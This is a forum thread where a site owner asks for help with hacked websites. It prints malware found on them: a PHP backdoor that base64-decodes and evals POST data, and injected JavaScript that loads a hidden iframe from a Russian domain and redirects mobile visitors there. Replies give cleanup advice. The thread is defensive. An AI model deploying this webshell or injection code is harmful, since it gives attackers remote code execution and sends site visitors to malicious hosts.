Anyone got experience of malicious scripts?
Discussion
I have a couple of websites out there and a couple have been hacked and sending out millions of email spam messages. I found two php files that seemed to be the 'engines' of the hack but have also found some dubious looking code in some other files. Extract below. Seems very dodgy to me:
$version = "1.5";
if(!empty($_POST["gjwqweodsa"]) and strlen($_POST["gjwqweodsa"]) > 0 and isset($_POST["gjwqweodsa"])){
$isevalfunctionavailable = false;
$evalcheck = "\$isevalfunctionavailable = true;";
@eval($evalcheck);
if ($isevalfunctionavailable === true) {
$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
$fv = $fnsdht($_POST["gjwqweodsa"]);
@eval($fv);
//@eval($_POST["gjwqweodsa"]);
}else{
$mpath = realpath("")."/";
//$dop = "\n@unlink(\"".$mpath."dsadasdsa1fag1.php\");\n";
if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php\n".$fnsdht($_POST["gjwqweodsa"])."\n?>")){
@include_once($mpath."dsadasdsa1fag1.php");
@unlink($mpath."dsadasdsa1fag1.php");
}else{
echo "ERROR! CANT DO NOTHING!";
}
}
}
$version = "1.5";
if(!empty($_POST["gjwqweodsa"]) and strlen($_POST["gjwqweodsa"]) > 0 and isset($_POST["gjwqweodsa"])){
$isevalfunctionavailable = false;
$evalcheck = "\$isevalfunctionavailable = true;";
@eval($evalcheck);
if ($isevalfunctionavailable === true) {
$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
$fv = $fnsdht($_POST["gjwqweodsa"]);
@eval($fv);
//@eval($_POST["gjwqweodsa"]);
}else{
$mpath = realpath("")."/";
//$dop = "\n@unlink(\"".$mpath."dsadasdsa1fag1.php\");\n";
if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php\n".$fnsdht($_POST["gjwqweodsa"])."\n?>")){
@include_once($mpath."dsadasdsa1fag1.php");
@unlink($mpath."dsadasdsa1fag1.php");
}else{
echo "ERROR! CANT DO NOTHING!";
}
}
}
Defo looks dodgy. Malware often uses base64 encoded URLS and malware code to avoid putting the actual URL of the remote malware hosting site/malware code in your source code.
I suggest you look for recently modified files for clues, and also download and search your source code files for base64_decode. another tactic is to reverse dodgy commands and then use strrev to put the command in the right order when executing it.
There are a few free virus scanners out there e.g. from AVG that will access your website and report any references to malware sites. you can also buy a security service from Symantec which will see them scan your website every day and look for/report injected malware urls.
ETA you should do the standard things like updating any wordpress/joomla back ends, any plugins etc., change website passwords to try and close the holes. There may be plugins to block access to your site from countries that have lots of hackers and who are unlikely to legitimately access your sites (China and Russia being two common sources of attacks)
I suggest you look for recently modified files for clues, and also download and search your source code files for base64_decode. another tactic is to reverse dodgy commands and then use strrev to put the command in the right order when executing it.
There are a few free virus scanners out there e.g. from AVG that will access your website and report any references to malware sites. you can also buy a security service from Symantec which will see them scan your website every day and look for/report injected malware urls.
ETA you should do the standard things like updating any wordpress/joomla back ends, any plugins etc., change website passwords to try and close the holes. There may be plugins to block access to your site from countries that have lots of hackers and who are unlikely to legitimately access your sites (China and Russia being two common sources of attacks)
Edited by TurricanII on Wednesday 8th January 21:32
i don't have the full logs as it's third party hosted but i've also foud this in index.php:
echo "<script type=\"text/javascript\">
function sd5135GHEDF(agaga31323l) {
var melm = document.getElementById(\"a35fdsfdsf62FFSSD\");
if (typeof(melm) != \"undefined\" && melm!= null)
{}else{
var dsdSSSWrw515312FFF = document.createElement(\"iframe\");
dsdSSSWrw515312FFF.id = \"a35fdsfdsf62FFSSD\";
dsdSSSWrw515312FFF.style.width = \"10px\";
dsdSSSWrw515312FFF.style.height = \"10px\";
dsdSSSWrw515312FFF.style.border = \"0px\";
dsdSSSWrw515312FFF.frameBorder = \"0\";
dsdSSSWrw515312FFF.style.position = \"absolute\";
dsdSSSWrw515312FFF.style.left = \"-200\";
dsdSSSWrw515312FFF.setAttribute(\"frameBorder\", \"0\");
document.body.appendChild(dsdSSSWrw515312FFF);
dsdSSSWrw515312FFF.src = agaga31323l;
return true;
}
}
function asd61234tkhjasd454hfhf235(){
sd5135GHEDF(\"http://novostivkontakte.ru/?id=ifrm\");
}
function SFWR64362fdhHHHHH(){
if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();}
if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i)!==null){
try{setTimeout(function(){window.location=\"http://novostivkontakte.ru/?id=mob\";},1000);}
catch(err) {window.location=\"http://novostivkontakte.ru/?id=mob\";location.href=\"http://novostivkontakte.ru/?id=mob\";}
}
}
//setTimeout(function(){R();},1500);
try {
if(window.attachEvent) {
window.attachEvent(\"onload\", SFWR64362fdhHHHHH);
} else {
if(window.onload) {
var curronload = window.onload;
var newonload = function() {
curronload();
SFWR64362fdhHHHHH();
};
window.onload = newonload;
} else {
window.onload = SFWR64362fdhHHHHH;
}
}
} catch(err) {}
</script>";
echo "<script type=\"text/javascript\">
function sd5135GHEDF(agaga31323l) {
var melm = document.getElementById(\"a35fdsfdsf62FFSSD\");
if (typeof(melm) != \"undefined\" && melm!= null)
{}else{
var dsdSSSWrw515312FFF = document.createElement(\"iframe\");
dsdSSSWrw515312FFF.id = \"a35fdsfdsf62FFSSD\";
dsdSSSWrw515312FFF.style.width = \"10px\";
dsdSSSWrw515312FFF.style.height = \"10px\";
dsdSSSWrw515312FFF.style.border = \"0px\";
dsdSSSWrw515312FFF.frameBorder = \"0\";
dsdSSSWrw515312FFF.style.position = \"absolute\";
dsdSSSWrw515312FFF.style.left = \"-200\";
dsdSSSWrw515312FFF.setAttribute(\"frameBorder\", \"0\");
document.body.appendChild(dsdSSSWrw515312FFF);
dsdSSSWrw515312FFF.src = agaga31323l;
return true;
}
}
function asd61234tkhjasd454hfhf235(){
sd5135GHEDF(\"http://novostivkontakte.ru/?id=ifrm\");
}
function SFWR64362fdhHHHHH(){
if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();}
if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i)!==null){
try{setTimeout(function(){window.location=\"http://novostivkontakte.ru/?id=mob\";},1000);}
catch(err) {window.location=\"http://novostivkontakte.ru/?id=mob\";location.href=\"http://novostivkontakte.ru/?id=mob\";}
}
}
//setTimeout(function(){R();},1500);
try {
if(window.attachEvent) {
window.attachEvent(\"onload\", SFWR64362fdhHHHHH);
} else {
if(window.onload) {
var curronload = window.onload;
var newonload = function() {
curronload();
SFWR64362fdhHHHHH();
};
window.onload = newonload;
} else {
window.onload = SFWR64362fdhHHHHH;
}
}
} catch(err) {}
</script>";
Can you get any history on addresses accessing the pages containing the code? It's been... 10 years since I wrote any PHP but it looks like it'd let someone take over and run whatever they want within PHP on that website by passing a php file as POST data and either running it with eval or passing it out as a file. But it could be being accessed by a separate script on another website hence the question as it might lead back to a URL, domain owner etc.
Probably something in China but hey.....
Probably something in China but hey.....
Gassing Station | Computers, Gadgets & Stuff | Top of Page | What's New | My Stuff